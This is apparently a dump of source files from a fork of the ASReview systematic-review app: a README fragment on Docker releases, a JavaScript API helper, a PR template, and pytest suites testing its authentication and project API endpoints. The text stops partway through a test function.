src=\"https://www.herokucdn.com/deploy/button.svg\" height=\"30px\">](https://heroku.com/deploy?template=https://github.com/asreview/asreview/tree/master)\n\n❗❗❗ ASReview doesn't have builtin authentication. You are responsible for the authentication and security of the server yourself.\n\n\n## Release instructions\n\n### Docker\n\nA Docker image is created when a tag or a commit to `master` is pushed.\nThe workflow `docker.yml` builds images for platforms `linux/amd64` and `linux/arm64`.\nIf, for some reason, the image is not built, you can build manually with the commands below.\nFind the manual instructions at <https://docs.docker.com/docker-hub/> and <https://docs.github.com/en/packages/working-with-a-github-packages-registry/working-with-the-container-registry>.\nReplace the version numbers below by the version you want to push.\n\nASReview LAB\n```\ndocker build -t asreview/asreview .\ndocker build -t asreview/asreview:1.0 .\ndocker push ghcr.io/asreview/asreview\ndocker push ghcr.io/asreview/asreview:1.0\n```\n\nIf you are creating a Docker container that runs the app with a [config file](#full-configuration) do __not forget__ to override the IP-address of the Flask backend. Set the HOST variable to \"0.0.0.0\" since the default \"localhost\" can't be reached from outside the container.\n" }, { "alpha_fraction": 0.5409836173057556, "alphanum_fraction": 0.5409836173057556, "avg_line_length": 22.238094329833984, "blob_id": "ce696fbd9c96478a7f82d9946ef724a16855b3b6", "content_id": "22b08b5ad6289f7485012a3edd268a68b800f06d", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 488, "license_type": "permissive", "max_line_length": 56, "num_lines": 21, "path": "/asreview/webapp/src/api/BaseAPI.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import { axiosErrorHandler } from \"./axiosErrorHandler\";\nimport { base_url } from \"../globals.js\";\nimport axios from \"axios\";\n\nclass BaseAPI {\n static boot = ({ queryKey }) => {\n const url = base_url + `boot`;\n return new Promise((resolve, reject) => {\n axios\n .get(url)\n .then((result) => {\n resolve(result[\"data\"]);\n })\n .catch((error) => {\n reject(axiosErrorHandler(error));\n });\n });\n };\n}\n\nexport default BaseAPI;\n" }, { "alpha_fraction": 0.7245283126831055, "alphanum_fraction": 0.7245283126831055, "avg_line_length": 17.928571701049805, "blob_id": "7c67c22e2d5b6cd306eb2b7c13201fe9e375b32b", "content_id": "bd6559d2ff2a419d71dcdb612d54c5738f0fbd9b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": true, "language": "Markdown", "length_bytes": 265, "license_type": "permissive", "max_line_length": 57, "num_lines": 14, "path": "/.github/PULL_REQUEST_TEMPLATE/pull_request_template.md", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "Changes proposed in this pull request:\n\n-\n-\n-\n\n*Add screenshots for proposed visual changes*\n\n\n**Checklist**\n\n- [ ] Unit tests are added for new features and bug fixes\n- [ ] Documentation is added for new features\n- [ ] Title of the pull request is self-explaining\n" }, { "alpha_fraction": 0.6505531072616577, "alphanum_fraction": 0.6630530953407288, "avg_line_length": 32.053016662597656, "blob_id": "94072723403763be0f6aaad935b89bfddd674e32", "content_id": "762a53d7b58e41d3dd8fd426af9fa5c1b00b92ab", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 18080, "license_type": "permissive", "max_line_length": 87, "num_lines": 547, "path": "/asreview/webapp/tests/test_api/test_auth.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import datetime as dt\nfrom inspect import getfullargspec\n\nimport pytest\n\nimport asreview.webapp.tests.utils.api_utils as au\nimport asreview.webapp.tests.utils.crud as crud\nfrom asreview.webapp import DB\nfrom asreview.webapp.tests.utils.config_parser import get_user\n\n# ###################\n# SIGNUP\n# ###################\n\n\n# test that creating a user when the app runs a no-creation\n# policy, is impossible\ndef test_impossible_to_signup_when_not_allowed(client_auth_no_creation):\n # get user data\n user = get_user(1)\n # post form data\n status_code, data = au.signup_user(client_auth_no_creation, user)\n # check if we get a 400 status\n assert status_code == 400\n assert data[\"message\"] == \"The app is not configured to create accounts\"\n\n\n# Successful signup returns a 200 but with an unconfirmed user and\n# an email token\ndef test_successful_signup_confirmed(client_auth_verified):\n # get user data\n user = get_user(1)\n # post form data\n status_code, data = au.signup_user(client_auth_verified, user)\n # check if we get a 200 status\n assert status_code == 201\n assert (\n data[\"message\"]\n == f\"An email has been sent to {user.email} \"\n + \"to verify your account. Please follow instructions.\"\n )\n\n\n# test basic signing up\ndef test_successful_signup_no_confirmation(client_auth):\n # get user data\n user = get_user(1)\n # post form data\n status_code, data = au.signup_user(client_auth, user)\n # check if we get a 201 status\n assert status_code == 201\n assert data[\"message\"] == f'User \"{user.email}\" created.'\n\n\n# Adding an existing identifier must return a 404 status and\n# appropriate message\ndef test_unique_identifier(client_auth):\n # get user data\n user = get_user(1)\n # insert this user\n crud.create_user(DB, user)\n # try to create the same user again with the api\n status_code, data = au.signup_user(client_auth, user)\n assert status_code == 403\n assert data[\"message\"] == f'User with email \"{user.email}\" already exists.'\n\n\n# Adding an existing email must return a 404 status and\n# appropriate message\ndef test_unique_email(client_auth):\n # get user data\n user1 = get_user(1)\n user2 = get_user(2)\n # insert user1\n crud.create_user(DB, user1)\n # try to create the user2 with the same email as user1 with the api\n user2.email = user1.email\n status_code, data = au.signup_user(client_auth, user2)\n assert status_code == 403\n assert data[\"message\"] == f'User with email \"{user2.email}\" already exists.'\n\n\n# ###################\n# SIGNIN\n# ###################\n\n\n# Verified user creation: user can not signin with unconfirmed account\ndef test_unsuccessful_signin_with_unconfirmed_account(client_auth_verified):\n # get user data\n user = get_user(1)\n # create user with signup\n status_code, data = au.signup_user(client_auth_verified, user)\n # check if we get a 201 status\n assert status_code == 201\n # try to sign in\n status_code, data = au.signin_user(client_auth_verified, user)\n assert status_code == 404\n assert data[\"message\"] == f\"User account {user.email} is not confirmed.\"\n\n\n# Successfully signing in a user must return a 200 response\ndef test_successful_signin(client_auth):\n # get user data\n user = get_user(1)\n # create user with signup, no confirmation\n status_code, data = au.signup_user(client_auth, user)\n # check if we get a 201 status\n assert status_code == 201\n # signin\n status_code, data = au.signin_user(client_auth, user)\n assert status_code == 200\n assert data[\"message\"] == f\"User {user.identifier} is logged in.\"\n\n\n# Wrong password must return a 404 response with and an appropriate response\ndef test_unsuccessful_signin_wrong_password(client_auth):\n # get user data\n user = get_user(1)\n # create user with signup, no confirmation\n status_code, data = au.signup_user(client_auth, user)\n # check if we get a 201 status\n assert status_code == 201\n # change password\n user.password = \"wrong_password\"\n # signin\n status_code, data = au.signin_user(client_auth, user)\n assert status_code == 404\n assert data[\"message\"] == f\"Incorrect password for user {user.identifier}.\"\n\n\n# Wrong email must return a 404 response and with an appropriate response\ndef test_unsuccessful_signin_wrong_email(client_auth):\n # get user data\n user = get_user(1)\n # create user with signup, no confirmation\n status_code, data = au.signup_user(client_auth, user)\n # check if we get a 201 status\n assert status_code == 201\n # change email and identifier\n user.email = \"[email protected]\"\n user.identifier = \"[email protected]\"\n # signin\n status_code, data = au.signin_user(client_auth, user)\n assert status_code == 404\n assert data[\"message\"] == f\"User account {user.identifier} does not exist.\"\n\n\n# ###################\n# SIGNOUT\n# ###################\n\n\n# Signing out must return a 200 status and an appropriate message\ndef test_signout(client_auth):\n # create user\n user = au.create_and_signin_user(client_auth)\n # signout\n status_code, data = au.signout_user(client_auth)\n # expect a 200\n assert status_code == 200\n assert (\n data[\"message\"]\n == f\"User with identifier {user.identifier} has been signed out.\"\n )\n\n\n# ###################\n# CONFIRMATION\n# ###################\n\n\n# A new token is created on signup, that token is can be confirmed\n# by the confirm route\ndef test_token_confirmation_after_signup(client_auth_verified):\n # signup user\n user = get_user(1)\n status_code, data = au.signup_user(client_auth_verified, user)\n # refresh user\n user = crud.get_user_by_identifier(user.identifier)\n # now we confirm this user\n status_code, data = au.confirm_user(client_auth_verified, user)\n assert status_code == 200\n assert data[\"message\"] == f\"User {user.identifier} confirmed.\"\n\n\n# A token expires in 24 hours, test confirmation response after\n# 24 hours\ndef test_expired_token(client_auth_verified):\n # signup user\n user = get_user(1)\n status_code, data = au.signup_user(client_auth_verified, user)\n # refresh user\n user = crud.get_user_by_identifier(user.identifier)\n # manipulate token_created_at\n new_created_at = user.token_created_at - dt.timedelta(hours=28)\n user.token_created_at = new_created_at\n DB.session.commit()\n # now we try to confirm this user\n status_code, data = au.confirm_user(client_auth_verified, user)\n assert status_code == 403\n assert \"token has expired\" in data[\"message\"]\n\n\n# Confirmation user: if the user can't be found, this route should\n# return a 404\ndef test_if_this_route_returns_404_user_not_found(client_auth_verified):\n # signup user\n user = get_user(1)\n status_code, data = au.signup_user(client_auth_verified, user)\n # make sure the user account is created\n assert crud.count_users() == 1\n # we keep the user model as is, not retrieving it from the DB\n # which ensures an id-less object that can be manipulated\n user.id = 100\n # now we try to confirm this user\n status_code, data = au.confirm_user(client_auth_verified, user)\n assert status_code == 404\n assert data[\"message\"] == \"No user account / correct token found.\"\n\n\n# If the token cant be found, this route should return a 404\ndef test_if_this_route_returns_404_token_not_found(client_auth_verified):\n # signup user\n user = get_user(1)\n status_code, data = au.signup_user(client_auth_verified, user)\n # make sure the user account is created\n assert crud.count_users() == 1\n # we keep the user model as is, not retrieving it from the DB\n # which ensures an id-less object that can be manipulated\n user.token = \"wrong_token\"\n # now we try to confirm this user\n status_code, data = au.confirm_user(client_auth_verified, user)\n assert status_code == 404\n assert data[\"message\"] == \"No user account / correct token found.\"\n\n\n# If we are not doing verification this route should return a 400\ndef test_confirm_route_returns_400_if_app_not_verified(client_auth):\n # signup user\n user = get_user(1)\n status_code, data = au.signup_user(client_auth, user)\n # refresh user object\n user = crud.get_user_by_identifier(user.identifier)\n # now we try to confirm this user\n status_code, data = au.confirm_user(client_auth, user)\n assert status_code == 400\n assert data[\"message\"] == \"The app is not configured to verify accounts.\"\n\n\n# ###################\n# PROFILE\n# ###################\n\n\n# Test user data if we request is\[email protected](\n \"attribute\", [\"email\", \"identifier\", \"name\", \"origin\", \"affiliation\"]\n)\ndef test_get_profile(client_auth, attribute):\n user = au.create_and_signin_user(client_auth)\n # get profile\n status_code, data = au.get_profile(client_auth)\n assert status_code == 200\n # assert if none is blank\n assert data[\"message\"][attribute] != \"\"\n # compare with user\n assert data[\"message\"][attribute] == getattr(user, attribute)\n\n\n# Test profile data not returned when user id does not exists\ndef test_get_profile_if_user_id_does_not_exist(client_auth):\n au.create_and_signin_user(client_auth)\n # remove this user from the database\n crud.delete_users(DB)\n # get profile\n status_code, data = au.get_profile(client_auth)\n assert status_code == 404\n assert data[\"message\"] == \"No user found.\"\n\n\n# #####################\n# FORGOT/RESET PASSWORD\n# #####################\n\n\n# Test forgot_password can't be called if we don't run an\n# email config\ndef test_forgot_password_no_email_config(client_auth):\n # signup user\n user = get_user(1)\n status_code, data = au.signup_user(client_auth, user)\n # forgot password\n status_code, data = au.forgot_password(client_auth, user)\n assert status_code == 404\n assert data[\"message\"] == \"Forgot-password feature is not used in this app.\"\n\n\n# Test forgot_password works under normal circumstances\ndef test_forgot_password_works(client_auth_verified):\n # signup user\n user = get_user(1)\n status_code, data = au.signup_user(client_auth_verified, user)\n # forgot password\n status_code, data = au.forgot_password(client_auth_verified, user)\n assert status_code == 200\n assert data[\"message\"] == f\"An email has been sent to {user.email}\"\n\n\n# Test forgot_password: user not found\ndef test_forgot_password_no_user(client_auth_verified):\n # get user, no signup\n user = get_user(1)\n # forgot password\n status_code, data = au.forgot_password(client_auth_verified, user)\n assert status_code == 404\n assert data[\"message\"] == f'User with email \"{user.email}\" not found.'\n\n\n# Test forgot_password: origin is not \"asreview\"\ndef test_forgot_password_wrong_origin(client_auth_verified):\n # signup user\n user = get_user(1)\n status_code, data = au.signup_user(client_auth_verified, user)\n # get fresh user object and change origin\n user = crud.update_user(DB, user, \"origin\", \"github\")\n # forgot password\n status_code, data = au.forgot_password(client_auth_verified, user)\n assert status_code == 404\n assert data[\"message\"] == f\"Your account has been created with {user.origin}.\"\n\n\n# Test resetting password when not configured\ndef test_reset_password_no_email_config(client_auth):\n # signup user\n user = get_user(1)\n status_code, data = au.signup_user(client_auth, user)\n # get user\n user = crud.get_user_by_identifier(user.identifier)\n user.password = \"NewPassword123!\"\n # forgot password\n status_code, data = au.reset_password(client_auth, user)\n assert status_code == 404\n assert data[\"message\"] == \"Reset-password feature is not used in this app.\"\n\n\n# Test resetting password\ndef test_reset_password(client_auth_verified):\n # signup user\n user = get_user(1)\n au.signup_user(client_auth_verified, user)\n # forgot password\n au.forgot_password(client_auth_verified, user)\n # get user and provide new password\n user = crud.get_user_by_identifier(user.identifier)\n user.password = \"NewPassword123!\"\n # reset it\n status_code, data = au.reset_password(client_auth_verified, user)\n assert status_code == 200\n assert data[\"message\"] == \"Password updated.\"\n\n\n# Test reset password: id not found\ndef test_reset_password_with_wrong_user_id(client_auth_verified):\n # signup user\n user = get_user(1)\n au.signup_user(client_auth_verified, user)\n # forgot password\n au.forgot_password(client_auth_verified, user)\n # get user and provide new password\n user = crud.get_user_by_identifier(user.identifier)\n user.password = \"NewPassword123!\"\n # and remove from database to manipulate user-not-found\n crud.delete_users(DB)\n # reset it\n status_code, data = au.reset_password(client_auth_verified, user)\n assert status_code == 404\n assert (\n data[\"message\"]\n == \"User not found, try restarting the forgot-password procedure.\"\n )\n\n\n# Test reset password: token is stale\ndef test_reset_password_with_stale_token(client_auth_verified):\n # signup user\n user = get_user(1)\n au.signup_user(client_auth_verified, user)\n # forgot password\n au.forgot_password(client_auth_verified, user)\n # get user and provide new password\n user = crud.get_user_by_identifier(user.identifier)\n user.password = \"NewPassword123!\"\n new_created_at = user.token_created_at - dt.timedelta(hours=28)\n user.token_created_at = new_created_at\n DB.session.commit()\n # reset password\n status_code, data = au.reset_password(client_auth_verified, user)\n assert status_code == 404\n assert (\n data[\"message\"]\n == \"Token is invalid or too old, restart the forgot-password procedure.\"\n )\n\n # Test reset password: invalid password\n # signup user\n user = get_user(1)\n au.signup_user(client_auth_verified, user)\n # forgot password\n au.forgot_password(client_auth_verified, user)\n # get user and provide new password\n user = crud.get_user_by_identifier(user.identifier)\n user.password = \"123\"\n # reset password\n status_code, data = au.reset_password(client_auth_verified, user)\n assert status_code == 500\n assert \"Unable to reset your password!\" in data[\"message\"]\n assert \"does not meet requirements\" in data[\"message\"]\n\n\n# ###################\n# UPDATE USER PROFILE\n# ###################\n\n\n# test updating normal attributes from user profile\ndef test_update_user_profile_simple_attributes(client_auth):\n # create and signin user\n user = au.create_and_signin_user(client_auth)\n # prep data\n data = {\n \"email\": \"[email protected]\",\n \"name\": \"new_name\",\n \"affiliation\": \"new_affiliation\",\n \"public\": int(not user.public),\n }\n # call update\n status_code, data = au.update_user(client_auth, data)\n assert status_code == 200\n assert data[\"message\"] == \"User profile updated.\"\n\n\n# test updating the password\ndef test_update_password(client_auth):\n # create and signin user\n user = au.create_and_signin_user(client_auth)\n # prep data\n new_password = \"NewPassword123#\"\n data = {\n \"email\": user.email,\n \"name\": user.name,\n \"affiliation\": user.affiliation,\n \"public\": int(user.public),\n \"password\": new_password,\n }\n # call update\n status_code, data = au.update_user(client_auth, data)\n assert status_code == 200\n assert data[\"message\"] == \"User profile updated.\"\n # Checking if new password works signout\n au.signout_user(client_auth)\n # signin with new password\n user.password = new_password\n status_code, data = au.signin_user(client_auth, user)\n assert status_code == 200\n\n\n# test updating wrong new attribute values\[email protected](\n \"attribute_data\",\n [\n (\"email\", \"email\"),\n (\"email\", \"[email protected]\"),\n (\"name\", \"\"),\n (\"password\", \"abc\"),\n ],\n)\ndef test_update_user_with_wrong_values(client_auth, attribute_data):\n # make sure I have another user to test email duplication\n user = crud.create_user(DB, 2)\n # get attribute and value from parametrize\n attr, wrong_value = attribute_data\n # create user and signin user\n user = au.create_and_signin_user(client_auth)\n data = {\n \"email\": user.email,\n \"name\": user.name,\n \"affiliation\": user.affiliation,\n \"public\": int(user.public),\n \"password\": \"ABcd!1234\", # valid password\n }\n # manipulate attribute\n data[attr] = wrong_value\n # update\n status_code, data = au.update_user(client_auth, data)\n assert status_code == 500\n assert \"Unable to update your profile\" in data[\"message\"]\n assert (attr.capitalize() in data[\"message\"]) or attr in data[\"message\"]\n\n\n# ###################\n# REFRESH\n# ###################\n\n\n# Test refresh: user signed in\ndef test_refresh_with_signed_in_user(client_auth):\n # create and signin user\n user = au.create_and_signin_user(client_auth)\n # refresh\n status_code, data = au.refresh(client_auth)\n assert status_code == 200\n assert data[\"id\"] == user.id\n assert data[\"logged_in\"] is True\n assert data[\"name\"] == user.name\n\n\n# Test refresh: user NOT signed in\ndef test_refresh_with_signed_out_user(client_auth):\n # create and signin user\n au.create_and_signin_user(client_auth)\n # signout\n au.signout_user(client_auth)\n # refresh\n status_code, data = au.refresh(client_auth)\n assert status_code == 200\n assert data[\"id\"] is None\n assert data[\"logged_in\"] is False\n assert data[\"name\"] == \"\"\n\n\n# ###################\n# TEST LOGIN REQUIRED\n# ###################\n\n\n# User must be logged in, in order to signout,\n# we expect an error if we sign out if not signed in\[email protected](\"api_call\", [au.signout_user, au.get_profile, au.update_user])\ndef test_must_be_signed_in_to_signout(client_auth, api_call):\n if len(getfullargspec(api_call).args) == 1:\n status_code, data = api_call(client_auth)\n else:\n status_code, data = api_call(client_auth, {})\n # asserts\n assert status_code == 401\n assert data[\"message\"] == \"Login required.\"\n" }, { "alpha_fraction": 0.6540408730506897, "alphanum_fraction": 0.6636806130409241, "avg_line_length": 32.89439010620117, "blob_id": "1d7aca8cfa00e77645067377353167bf5c7d6c0e", "content_id": "d1a9859b6ad5a2d304c0bd6331182d2083027734", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 20540, "license_type": "permissive", "max_line_length": 84, "num_lines": 606, "path": "/asreview/webapp/tests/test_api/test_projects.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import inspect\nimport time\nfrom typing import Union\n\nimport pytest\nfrom flask.testing import FlaskClient\n\nimport asreview.webapp.tests.utils.api_utils as au\nimport asreview.webapp.tests.utils.crud as crud\nimport asreview.webapp.tests.utils.misc as misc\nfrom asreview.project import ASReviewProject\nfrom asreview.webapp import DB\nfrom asreview.webapp.authentication.models import Project\nfrom asreview.webapp.tests.utils.misc import current_app_is_authenticated\nfrom asreview.webapp.tests.utils.misc import retrieve_project_url_github\n\n# NOTE: I don't see a plugin that can be used for testing\n# purposes\nUPLOAD_DATA = [\n {\"benchmark\": \"benchmark:Hall_2012\"},\n {\n \"url\": \"https://raw.githubusercontent.com/asreview/\"\n + \"asreview/master/tests/demo_data/generic_labels.csv\"\n },\n]\nIMPORT_PROJECT_URLS = retrieve_project_url_github()\n\n# NOTE: the setup fixture entails: a FlaskClient, 1 user (signed in),\n# and a project of this user OR a project from an unauthenticated app.\n# The fixture is parametrized! It runs the authenticated app and the\n# unauthenticated app.\n\n\n# Test getting all projects\ndef test_get_projects(setup):\n client, user1, project = setup\n status_code, data = au.get_all_projects(client)\n assert status_code == 200\n assert len(data[\"result\"]) == 1\n found_project = data[\"result\"][0]\n if current_app_is_authenticated():\n assert found_project[\"id\"] == project.project_id\n assert found_project[\"owner_id\"] == user1.id\n else:\n assert found_project[\"id\"] == project.config[\"id\"]\n\n\n# Test create a project\ndef test_create_projects(setup):\n client, _, _ = setup\n project_name = \"new_project\"\n\n status_code, data = au.create_project(client, project_name)\n assert status_code == 201\n assert data[\"name\"] == project_name\n\n\n# Test upgrading a post v0.x project\ndef test_try_upgrade_a_modern_project(setup):\n client, _, project = setup\n # verify version\n data = misc.read_project_file(project)\n assert not data[\"version\"].startswith(\"0\")\n\n status_code, data = au.upgrade_project(client, project)\n assert status_code == 400\n assert data[\"message\"] == \"Can only convert v0.x projects.\"\n\n\n# Test upgrading a v0.x project\ndef test_upgrade_an_old_project(setup):\n client, user, _ = setup\n # get an old version from github\n old_project_url = retrieve_project_url_github(\"v0.19\")\n project = misc.copy_github_project_into_asreview_folder(old_project_url)\n # we need to make sure this new, old-style project can be found\n # under current user if the app is authenticated\n if current_app_is_authenticated():\n new_project = Project(project_id=project.config.get(\"id\"))\n project = crud.create_project(DB, user, new_project)\n print(type(project))\n # try to convert\n status_code, data = au.upgrade_project(client, project)\n assert status_code == 200\n assert data[\"success\"]\n\n\n# Test importing old projects, verify ids\[email protected](\"url\", IMPORT_PROJECT_URLS)\ndef test_import_project_files(setup, url):\n client, user, first_project = setup\n # import project\n status_code, data = au.import_project(client, url)\n # get contents asreview folder\n folders = set(misc.get_folders_in_asreview_path())\n # asserts\n assert len(folders) == 2\n assert status_code == 200\n assert isinstance(data, dict)\n if current_app_is_authenticated():\n # assert it exists in the database\n assert crud.count_projects() == 2\n project = crud.last_project()\n assert data[\"id\"] != first_project.project_id\n assert data[\"id\"] == project.project_id\n # assert the owner is current user\n assert data[\"owner_id\"] == user.id\n else:\n assert data[\"id\"] != first_project.config.get(\"id\")\n # in auth/non-auth the project folder must exist in the asreview folder\n assert data[\"id\"] in set([f.stem for f in folders])\n\n\n# Test get stats in setup state\ndef test_get_projects_stats_setup_stage(setup):\n client, _, _ = setup\n status_code, data = au.get_project_stats(client)\n assert status_code == 200\n assert isinstance(data[\"result\"], dict)\n assert data[\"result\"][\"n_in_review\"] == 0\n assert data[\"result\"][\"n_finished\"] == 0\n assert data[\"result\"][\"n_setup\"] == 1\n\n\n# Test get stats in review state\ndef test_get_projects_stats_review_stage(setup):\n client, _, project = setup\n # start the show\n au.upload_label_set_and_start_model(client, project, UPLOAD_DATA[0])\n # get stats\n status_code, data = au.get_project_stats(client)\n assert status_code == 200\n assert isinstance(data[\"result\"], dict)\n assert data[\"result\"][\"n_in_review\"] == 1\n assert data[\"result\"][\"n_finished\"] == 0\n assert data[\"result\"][\"n_setup\"] == 0\n\n\n# Test get stats in finished state\ndef test_get_projects_stats_finished_stage(setup):\n client, _, project = setup\n # start the show\n au.upload_label_set_and_start_model(client, project, UPLOAD_DATA[0])\n # manually finish the project\n au.set_project_status(client, project, \"finished\")\n # get stats\n status_code, data = au.get_project_stats(client)\n assert status_code == 200\n assert isinstance(data[\"result\"], dict)\n assert data[\"result\"][\"n_in_review\"] == 0\n assert data[\"result\"][\"n_finished\"] == 1\n assert data[\"result\"][\"n_setup\"] == 0\n\n\n# Test known demo data\[email protected](\"subset\", [\"plugin\", \"benchmark\"])\ndef test_demo_data_project(setup, subset):\n client, _, _ = setup\n status_code, data = au.get_demo_data(client, subset)\n assert status_code == 200\n assert isinstance(data[\"result\"], list)\n\n\n# Test unknown demo data\ndef test_unknown_demo_data_project(setup):\n client, _, _ = setup\n status_code, data = au.get_demo_data(client, \"abcdefg\")\n assert status_code == 400\n assert data[\"message\"] == \"demo-data-loading-failed\"\n\n\n# Test uploading benchmark data to a project\[email protected](\"upload_data\", UPLOAD_DATA)\ndef test_upload_benchmark_data_to_project(setup, upload_data):\n client, _, project = setup\n status_code, data = au.upload_data_to_project(client, project, data=upload_data)\n assert status_code == 200\n if current_app_is_authenticated():\n assert data[\"project_id\"] == project.project_id\n else:\n assert data[\"project_id\"] == project.config.get(\"id\")\n\n\n# Test getting the data after an upload\[email protected](\"upload_data\", UPLOAD_DATA)\ndef test_get_project_data(setup, upload_data):\n client, _, project = setup\n au.upload_data_to_project(client, project, data=upload_data)\n status_code, data = au.get_project_data(client, project)\n assert status_code == 200\n assert data[\"filename\"] == misc.extract_filename_stem(upload_data)\n\n\n# Test get dataset writer\ndef test_get_dataset_writer(setup):\n client, _, project = setup\n # upload data\n au.upload_data_to_project(client, project, data=UPLOAD_DATA[0])\n # get dataset writer\n status_code, data = au.get_project_dataset_writer(client, project)\n assert status_code == 200\n assert isinstance(data[\"result\"], list)\n\n\n# Test updating a project\ndef test_update_project_info(setup):\n client, _, project = setup\n # update data\n new_mode = \"oracle\"\n new_name = \"new name\"\n new_authors = \"new authors\"\n new_description = \"new description\"\n # request\n status_code, data = au.update_project(\n client,\n project,\n name=new_name,\n mode=new_mode,\n authors=new_authors,\n description=new_description,\n )\n assert status_code == 200\n assert data[\"authors\"] == new_authors\n assert data[\"description\"] == new_description\n assert data[\"mode\"] == new_mode\n assert data[\"name\"] == new_name\n\n\n# Test search data\ndef test_search_data(setup):\n client, _, project = setup\n # upload dataset\n au.upload_data_to_project(client, project, data=UPLOAD_DATA[0])\n # search\n status_code, data = au.search_project_data(\n client, project, query=\"Software&n_max=10\"\n )\n assert status_code == 200\n assert \"result\" in data\n assert isinstance(data[\"result\"], list)\n assert len(data[\"result\"]) <= 10\n\n\n# Test get a selection of random papers to find exclusions\ndef test_random_prior_papers(setup):\n client, _, project = setup\n # upload dataset\n au.upload_data_to_project(client, project, data=UPLOAD_DATA[0])\n # get random selection\n status_code, data = au.get_prior_random_project_data(client, project)\n assert status_code == 200\n assert \"result\" in data\n assert isinstance(data[\"result\"], list)\n assert len(data[\"result\"]) > 0\n\n\n# Test labeling of prior data\[email protected](\"label\", [0, 1])\ndef test_label_item(setup, label):\n client, _, project = setup\n # upload dataset\n au.upload_data_to_project(client, project, data=UPLOAD_DATA[0])\n # label\n status_code, data = au.label_random_project_data_record(client, project, label)\n assert status_code == 200\n assert data[\"success\"]\n\n\n# Test getting labeled records\ndef test_get_labeled_project_data(setup):\n client, _, project = setup\n # upload dataset\n au.upload_data_to_project(client, project, data=UPLOAD_DATA[0])\n # label a random record\n au.label_random_project_data_record(client, project, 1)\n # collect labeled records\n status_code, data = au.get_labeled_project_data(client, project)\n assert status_code == 200\n assert \"result\" in data\n assert isinstance(data[\"result\"], list)\n assert len(data[\"result\"]) == 1\n\n\n# Test getting labeled records stats\ndef test_get_labeled_stats(setup):\n client, _, project = setup\n # upload dataset\n au.upload_data_to_project(client, project, data=UPLOAD_DATA[0])\n # label 2 random records\n au.label_random_project_data_record(client, project, 1)\n au.label_random_project_data_record(client, project, 0)\n # collect stats\n status_code, data = au.get_labeled_project_data_stats(client, project)\n\n assert status_code == 200\n assert isinstance(data, dict)\n assert data[\"n\"] == 2\n assert data[\"n_exclusions\"] == 1\n assert data[\"n_inclusions\"] == 1\n assert data[\"n_prior\"] == 2\n\n\n# Test listing the available algorithms\ndef test_list_algorithms(setup):\n client, _, _ = setup\n status_code, data = au.get_project_algorithms_options(client)\n assert status_code == 200\n expected_keys = [\n \"balance_strategy\",\n \"classifier\",\n \"feature_extraction\",\n \"query_strategy\",\n ]\n for key in expected_keys:\n assert key in data.keys()\n assert isinstance(data[key], list)\n for item in data[key]:\n assert \"name\" in item.keys()\n assert \"label\" in item.keys()\n\n\n# Test setting the algorithms\ndef test_set_project_algorithms(setup):\n client, _, project = setup\n data = misc.choose_project_algorithms()\n status_code, data = au.set_project_algorithms(client, project, data=data)\n assert status_code == 200\n assert data[\"success\"]\n\n\n# Test getting the project algorithms\ndef test_get_project_algorithms(setup):\n client, _, project = setup\n data = misc.choose_project_algorithms()\n au.set_project_algorithms(client, project, data=data)\n # get the project algorithms\n status_code, resp_data = au.get_project_algorithms(client, project)\n assert status_code == 200\n assert resp_data[\"balance_strategy\"] == data[\"balance_strategy\"]\n assert resp_data[\"feature_extraction\"] == data[\"feature_extraction\"]\n assert resp_data[\"model\"] == data[\"model\"]\n assert resp_data[\"query_strategy\"] == data[\"query_strategy\"]\n\n\n# Test starting the model\ndef test_start_and_model_ready(setup):\n client, _, project = setup\n # upload dataset\n au.upload_data_to_project(client, project, data=UPLOAD_DATA[0])\n # label 2 random records\n au.label_random_project_data_record(client, project, 1)\n au.label_random_project_data_record(client, project, 0)\n # select a model\n data = misc.choose_project_algorithms()\n au.set_project_algorithms(client, project, data=data)\n # start the model\n status_code, data = au.start_project_algorithms(client, project)\n assert status_code == 200\n assert data[\"success\"]\n # make sure model is done\n time.sleep(10)\n\n\n# Test status of project\[email protected](\n (\"state_name\", \"expected_state\"),\n [\n (\"creation\", None),\n (\"setup\", \"setup\"),\n (\"review\", \"review\"),\n (\"finish\", \"finished\"),\n ],\n)\ndef test_status_project(setup, state_name, expected_state):\n client, _, project = setup\n # call these progression steps\n if state_name in [\"setup\", \"review\", \"finish\"]:\n # upload dataset\n au.upload_data_to_project(client, project, data=UPLOAD_DATA[0])\n # label 2 records\n au.label_random_project_data_record(client, project, 1)\n au.label_random_project_data_record(client, project, 0)\n # select a model\n data = misc.choose_project_algorithms()\n au.set_project_algorithms(client, project, data=data)\n if state_name in [\"review\", \"finish\"]:\n # start the model\n au.start_project_algorithms(client, project)\n time.sleep(15)\n if state_name == \"finish\":\n # mark project as finished\n au.set_project_status(client, project, \"finished\")\n\n status_code, data = au.get_project_status(client, project)\n assert status_code == 200\n assert data[\"status\"] == expected_state\n\n\n# Test exporting the results\[email protected](\"format\", [\"csv\", \"tsv\", \"xlsx\"])\ndef test_export_result(setup, format):\n client, _, project = setup\n # upload dataset\n au.upload_data_to_project(client, project, data=UPLOAD_DATA[0])\n au.label_random_project_data_record(client, project, 1)\n au.label_random_project_data_record(client, project, 0)\n # request\n status_code, _ = au.export_project_dataset(client, project, format)\n assert status_code == 200\n\n\n# Test exporting the entire project\ndef test_export_project(setup):\n client, _, project = setup\n # upload dataset\n au.upload_data_to_project(client, project, data=UPLOAD_DATA[0])\n au.label_random_project_data_record(client, project, 1)\n au.label_random_project_data_record(client, project, 0)\n # request\n status_code, _ = au.export_project(client, project)\n assert status_code == 200\n\n\n# Test setting the project status\[email protected](\"status\", [\"review\", \"finished\"])\ndef test_set_project_status(setup, status):\n client, _, project = setup\n # start the show\n au.upload_label_set_and_start_model(client, project, UPLOAD_DATA[0])\n # when setting the status to \"review\", the project must have another\n # status then \"review\"\n if status == \"review\":\n au.set_project_status(client, project, \"finished\")\n # set project status\n status_code, data = au.set_project_status(client, project, status)\n assert status_code == 200\n assert data[\"success\"]\n\n\n# Test get progress info\ndef test_get_progress_info(setup):\n client, _, project = 